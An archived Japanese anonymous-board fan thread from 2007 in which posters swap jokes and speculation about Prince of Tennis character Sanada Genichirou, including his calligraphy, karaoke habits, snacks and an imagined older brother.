158 :名無しかわいいよ名無し:2007/11/17(土) 16:22:10 ID:C/4PBW6i
>体操服
ネーム入れない学校で体育祭なんかの時は
ゼッケンの名前が超綺麗なレタリングとかねw

159 :名無しかわいいよ名無し:2007/11/17(土) 19:51:24 ID:d6snmNmv
級友's「真田、代表で鉢巻に何か書いてくれ」
真田「よかろう」

体育祭当日、赤組の鉢巻には「風林火山」と書かれ、白組を圧倒したという…



※赤は風林火山の将、武田信玄が好んで用いた色

160 :名無しかわいいよ名無し:2007/11/17(土) 20:53:27 ID:pHJ1Uika
>>159
うちの学校は先生が体育祭に仮装をするんだが
白雪姫をしたクラスの看板の文字が厚紙に習字で
書いて(超達筆)あった吹いたの思い出した。
字がきれいだから頼んだら雰囲気関係なしに書きそうだなww


161 :名無しかわいいよ名無し:2007/11/17(土) 20:55:34 ID:pHJ1Uika
>>160
「あった」じゃなくて「あって」だ。スマン。 

162 :名無しかわいいよ名無し:2007/11/17(土) 21:31:56 ID:cjch+lFt
そういえば以前スーパーの駐輪場で、
フレーム部分に「風林火山」と
力強く油性マジックで書かれたマウンテンバイクを発見して
つい真田を思い浮かべてしまったwww

163 :名無しかわいいよ名無し:2007/11/17(土) 21:46:33 ID:LBg4uW9t
自分が毎週日曜はなんかソワソワしてまうようなもんだわ

164 :名無しかわいいよ名無し:2007/11/18(日) 00:33:42 ID:FpBQGwO0
質問なのですが真田のバレンタイン・キッスでセリフの部分って柳生と切原とあと誰が喋ってるのでしょうか?

165 :名無しかわいいよ名無し:2007/11/18(日) 01:05:35 ID:s4X42Z9W
柳生と仁王だろ

166 :名無しかわいいよ名無し:2007/11/18(日) 15:22:50 ID:4V2DeC07
>真田、柳生、仁王

思えばテラ部長持ち上げのリーマン像ww


167 :名無しかわいいよ名無し:2007/11/18(日) 17:43:55 ID:UVt4ihsy
持ち上げる価値のある部長でよかったです

168 :名無しかわいいよ名無し:2007/11/18(日) 18:12:44 ID:wd5yY0Y7
は?

169 :名無しかわいいよ名無し:2007/11/18(日) 19:13:19 ID:wiWVAVBG
>>167
だな。つか持ち上げる価値があるから部長になったんだろうけどなw

170 :名無しかわいいよ名無し:2007/11/18(日) 20:12:25 ID:s4X42Z9W
あの間奏は
1柳生と仁王二人で真田をからかっている
2柳生はマジだが仁王はふざけている
3ふたりともマジ

自分は1か2だと思ってるんだがw

171 :名無しかわいいよ名無し:2007/11/19(月) 03:05:28 ID:LPYjT+9G
セリフ内容から考えると

>3ふたりともマジ

これだなw

172 :名無しかわいいよ名無し:2007/11/20(火) 00:41:42 ID:u/4fHOg8
昼に「季節のみそ汁」っての頼んだらなめこだった
なめこの季節だったんだね

173 :名無しかわいいよ名無し:2007/11/20(火) 13:24:58 ID:8MqGU1dy
DAMにNo Surrender入ってたよ。

174 :名無しかわいいよ名無し:2007/11/20(火) 17:19:09 ID:BMzlssaU
まじか。歌うしかないな

175 :名無しかわいいよ名無し:2007/11/21(水) 18:39:41 ID:V3l0COmr
歌いたい!…が、ピンチなので歌えん…orz

ふと思ったが。
弦ちゃんは毎月どんくらいお小遣いだか給料だか貰ってるんだろうか?

176 :名無しかわいいよ名無し:2007/11/21(水) 19:08:12 ID:iXewVoo7
よい子にふさわしい300円だったら笑う。
でもお小遣いで何買うんだろう。テニスや武道関係は家で買ってもらえるだろうし。
買い食いやカラオケに付き合ったりするのか?

177 :名無しかわいいよ名無し:2007/11/21(水) 19:24:06 ID:LEc98VQN
アニメでは俺だってカラオケくらいってアピールしてたなw
でも誰と行くんだ?幸村や柳はちょっと想像つかないし
ブン太や仁王とプライベートでそこまでつるんでるイメージもない
あれか、家族カラオケかw

178 :名無しかわいいよ名無し:2007/11/21(水) 21:01:36 ID:I1EBrtIJ
給料ってなんぞwww吹いたwww
確かに働いてそうに見えるが

179 :名無しかわいいよ名無し:2007/11/21(水) 21:11:51 ID:G9owBTYl
あえての一人カラオケとか・・・
「最近は一人カラオケなるものが流行っているようだから〜」なんぞ言って
部活が無い休日ずっとカラオケに居そうだ。

180 :名無しかわいいよ名無し:2007/11/21(水) 21:14:45 ID:vjFv+Zbt
チラ裏なうえに遅くて申し訳ないがやっと真田のアルバム買った!
ボーナスディスクすてきすぎる

181 :名無しかわいいよ名無し:2007/11/21(水) 23:28:46 ID:WCvVg1n+
ボーナスディスク羨まし過ぎるww
自分は今年の春頃買ったけどついてなかったwwww
やっぱり店によって差があるんだろうな


話し関係ないけど、100曲イベント出場決定おめでとう

182 :名無しかわいいよ名無し:2007/11/21(水) 23:34:49 ID:n8YcJOB4
発売から1年以上経ってるのにボーナスディスクつきってうらやま
自分も持ってるけどな。良かったねー

100曲おめ!なに歌うかはまだサイトには載ってないけど本誌では発表された?

183 :名無しかわいいよ名無し:2007/11/22(木) 04:13:47 ID:6dv5P2K1
>>176
DVだ!虐待だ!!
いまどき幼稚園児でももっと貰ってるぞ

184 :名無しかわいいよ名無し:2007/11/22(木) 14:36:05 ID:fNrwALIQ
>>177
そこでまさかの柳生とカラオケ。
でもなんか唱歌ばかり歌ってそうなイメージが。

185 :名無しかわいいよ名無し:2007/11/22(木) 17:30:12 ID:K+ekAdnB
カレンダーかなんかで無かったっけ?
立海みんなでカラオケに行ってる奴
真田は幸村と2人で歌ってたよ

186 :名無しかわいいよ名無し:2007/11/22(木) 18:47:37 ID:0L5JPLLy
真田がジャッカルに「これが日本の心だ」と
演歌を勧めたというエピが土器鯖にあったな
歌うんかな…

187 :名無しかわいいよ名無し:2007/11/22(木) 22:47:47 ID:K+ekAdnB
そういえば学プリでゲームの景品で熊の置物を持ってきてたな


188 :名無しかわいいよ名無し:2007/11/23(金) 20:01:13 ID:XgSyATBG
さすが真田

189 :名無しかわいいよ名無し:2007/11/23(金) 21:36:31 ID:w5un8Cz6
まぁとりあえず中学生じゃないなwwwww

190 :名無しかわいいよ名無し:2007/11/24(土) 00:46:59 ID:P1FAaL5z
だがそこがいい

191 :名無しかわいいよ名無し:2007/11/24(土) 03:27:42 ID:56OaF70M
>>185
アニメ絵のでそんなのあった。
幸村とデュエットしてて、柳が選曲してるやつ。

あれで飲み物が酒だったら完璧忘年会w

192 :名無しかわいいよ名無し:2007/11/25(日) 03:56:51 ID:7EbJc9jW
老けてるけど男らしくてかっこいいよ。
老けてるけど。

193 :名無しかわいいよ名無し:2007/11/25(日) 04:10:28 ID:0P9aeteq
老けてると何かマズイの?

194 :名無しかわいいよ名無し:2007/11/25(日) 04:21:14 ID:DiME1ypP
なんで噛み付くの?

195 :名無しかわいいよ名無し:2007/11/25(日) 04:27:52 ID:0P9aeteq
いや、素朴な疑問
老けてるを強調するから何か問題あるのかと思って
即レスありがとう

196 :名無しかわいいよ名無し:2007/11/25(日) 04:36:54 ID:DiME1ypP
ラジオとかでそんな扱い多いしね
特に何もないと思うよ

197 :名無しかわいいよ名無し:2007/11/25(日) 05:07:54 ID:iuEGyFli
老け=渋は真田の魅力の一部なんだぜ
×ないと思う
○あるわけない
こうだな

198 :名無しかわいいよ名無し:2007/11/25(日) 06:37:09 ID:ZDwc1kLo
ていうかギャップ萌えだし

199 :名無しかわいいよ名無し:2007/11/25(日) 07:15:34 ID:0P9aeteq
ギャップ萌えか、確かにそうだね

200 :名無しかわいいよ名無し:2007/11/25(日) 12:47:27 ID:5Uuril65
・赤也にゲームで勝てなくてコントローラーをもう一つ購入
・ジャンプを買うために他の雑誌は立ち読み

いつのだったか、ラジプリで聞いたけど
あの声であんなこと言うんだもんなあwwwww
つか真田の家にゲームがある事に驚きだww

201 :名無しかわいいよ名無し:2007/11/25(日) 18:13:43 ID:PyBG1yX6
>>200
ゲームで赤也に勝てない真田萌えるw
ゲーム本体はお兄さんの所有物な気がする
で、真田は将棋とかのソフトしか持ってないとかw

202 :名無しかわいいよ名無し:2007/11/25(日) 18:18:39 ID:aSZMhHM7
>>197
老けてんのは真田だけじゃないんだけどね
老け=格好悪いじゃないしね

203 :名無しかわいいよ名無し:2007/11/25(日) 19:03:35 ID:MGQHYKlp
>>200
やべえ。聞いたことないのに字面で萌えた。
これがいわゆるギャップ萌えか。そうなのかw

204 :名無しかわいいよ名無し:2007/11/26(月) 01:42:46 ID:+jkMyaq8
老け気味な言動は多いけど、実はちゃんと中学生してるんだな

205 :名無しかわいいよ名無し:2007/11/26(月) 03:57:02 ID:6SRkn9JA
>>200に追記すると、立ち読みするだけで何も買わないと申し訳無いから、うまい棒買ってるって言ってた

206 :名無しかわいいよ名無し:2007/11/26(月) 06:06:14 ID:ScXdfc/o
うまい棒wフイタwww
やっぱ肉好きとしてはサラミ味とかテリヤキバーガー味かな

207 :名無しかわいいよ名無し:2007/11/26(月) 07:25:03 ID:xi5UfX6r
うwまwいw棒wwwww
店員には「老け顔のうまい棒の人」って覚えられてそうだw

208 :名無しかわいいよ名無し:2007/11/26(月) 07:25:59 ID:cQH/YUCc
つコンポタ
きっとなめこの味噌汁味が出るのを心待ちにしてる

209 :名無しかわいいよ名無し:2007/11/27(火) 18:20:00 ID:FJg0c7kJ
話をトン切るが…。
真田の兄貴は正反対のちゃらんぽらんな感じか、真田よりも厳しい感じのどっちかなイメージがある

210 :名無しかわいいよ名無し:2007/11/27(火) 22:44:49 ID:dUXHEVH+
真田があんな性格だから反対にちゃらんぽらんだと面白いかも
そして兄のせいで色々と苦労してたりすると良いw

211 :名無しかわいいよ名無し:2007/11/28(水) 00:53:05 ID:a1IDYqo+
ちゃらんぽらんに一票w

外見はそっくりだが中身は似てない、性格正反対だったら面白いな。兄は誰からも好かれる人気者タイプとか。


212 :名無しかわいいよ名無し:2007/11/28(水) 01:17:26 ID:7cl6BH72
そんな兄を呆れつつも尊敬していると

213 :名無しかわいいよ名無し:2007/11/28(水) 02:40:26 ID:5RRTtQWf
たとえ言動がチャラチャラしてるように見えても
真田家はみんな努力家の血筋だと思ってるので、
勉強も運動も真田より少し上を行く尊敬できる兄貴がいいな。

214 :名無しかわいいよ名無し:2007/11/28(水) 10:47:39 ID:Mj0Ew2Xs
兄との年の差はどうなんだろう。
次男なのに「一」が付く名前なので、いっそ双子とか。
で、顔はそっくりなのに性格の全然違う双子とか。

215 :名無しかわいいよ名無し:2007/11/28(水) 17:14:54 ID:9rKxfGtF
自分は勝手に大学生くらいだと思ってる>兄
真田とは正反対の優男で、いつも真田の方がお兄さんだと間違えられたり

216 :名無しかわいいよ名無し:2007/11/28(水) 23:28:32 ID:29OQleuz
妄想は該当場所でやってくれないかな
そういうの好きじゃない人もいるんだって知ってくれ

217 :名無しかわいいよ名無し:2007/11/28(水) 23:52:52 ID:KUeHUHCS
うん、兄妄想はもういい……

218 :名無しかわいいよ名無し:2007/11/29(木) 02:17:25 ID:XRygssxZ
もともと妄想とくだらないネタしかないスレだしな

真田かっこいいよ真田

219 :名無しかわいいよ名無し:2007/11/29(木) 05:26:52 ID:Jlrv01TQ
>>215
自分も大学生ぐらいだと確信してた(根拠なし)
高2ぐらいでも普通に萌えるが

220 :名無しかわいいよ名無し:2007/11/29(木) 06:44:26 ID:2ehf6y4L
どうせ兄貴の好物もなめこの味噌汁なんだろ

真田家のなめこの味噌汁どんだけうまいんだよw

221 :名無しかわいいよ名無し:2007/11/29(木) 07:13:13 ID:k5iF/49Z
めっちゃ剣道強そう

222 :名無しかわいいよ名無し:2007/11/29(木) 08:08:56 ID:9k5iPxTS
真田最大の謎はなぜ剣道部じゃないのか、だからな
なんでテニスやってんだ。真田

223 :名無しかわいいよ名無し:2007/11/29(木) 08:14:10 ID:qO5qcqFk
「何故向日が体操部に入らなかったのか」と同レベルだな

224 :名無しかわいいよ名無し:2007/11/29(木) 10:07:09 ID:9naa5J7w
立海に剣道部ないんじゃない?あるの?

225 :名無しかわいいよ名無し:2007/11/29(木) 12:17:47 ID:DKuQrwHj
テニプリは、何でお前テニスやってんだって奴が一杯いるからね
そこは突っ込んじゃ駄目なんだと思うw

226 :名無しかわいいよ名無し:2007/11/30(金) 18:40:17 ID:uQpKIUsF
止まってるみたいなんでネタ投下。
柳スレ見てこい。

227 :名無しかわいいよ名無し:2007/11/30(金) 18:43:11 ID:4Nshhh/L
真田の黒帽子の前にある文字ってなんて書いてある?

228 :名無しかわいいよ名無し:2007/11/30(金) 19:29:31 ID:WY/mc3+f
307 名無しかわいいよ名無し sage New! 2007/11/30(金) 11:55:23 ID:cEVx0yaa
【久方ぶりだな】テニプリなめこの味噌汁スレ・4年【と2ヶ月と15日】

229 :名無しかわいいよ名無し:2007/11/30(金) 21:09:18 ID:PV26mCLh
>>227
Jack Purcell じゃなかったか

230 :uso:2007/12/01(土) 01:20:18 ID:H+3n9T1i
(`.∀´)<あれはどっかの国の言葉で

「なめこの味噌汁が好きだ」
って書いてあるナリ

231 :名無しかわいいよ名無し:2007/12/01(土) 12:57:09 ID:w6U8UWvs
嘘つけwww

232 :名無しかわいいよ名無し:2007/12/02(日) 03:26:51 ID:0HDOFkYR
名前覧みてなめこの味噌汁吹いたじゃないか

233 :名無しかわいいよ名無し:2007/12/02(日) 05:26:13 ID:2bwMTJld
( -_-)< uso とは「unidentified sagishi object」の略で、邦訳すると「未確認詐欺師物体」だ。
つまり一般的に出身地不明の詐欺師を指すのだよ、弦一郎。

234 :名無しかわいいよ名無し:2007/12/02(日) 05:50:10 ID:OEfJs4XK
本名でチャットに参加する真田がツボ。(小説の巻末ネタ)

235 :名無しかわいいよ名無し:2007/12/03(月) 16:48:58 ID:Zw+nYHD6
副部長ただいまっス ネズミの国のお土産のミ。キーさんの耳っスっ●●



236 :名無しかわいいよ名無し:2007/12/03(月) 18:34:17 ID:UdzmQayu
>>235
  ●_●_ 
 ( ‘へ‘)うむ。たまらん

237 :名無しかわいいよ名無し:2007/12/03(月) 21:11:46 ID:FY5STTCs
柳スレより拝借
http://hey.chu.jp/up/source3/No_10389.jpg

238 :名無しかわいいよ名無し:2007/12/03(月) 21:54:06 ID:Zw+nYHD6
六角中の皆から貰ってきたっス
つ苺のパンツ



239 :名無しかわいいよ名無し:2007/12/04(火) 02:38:37 ID:8otoFqYq
>>238
マルチやめてくれ

44 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)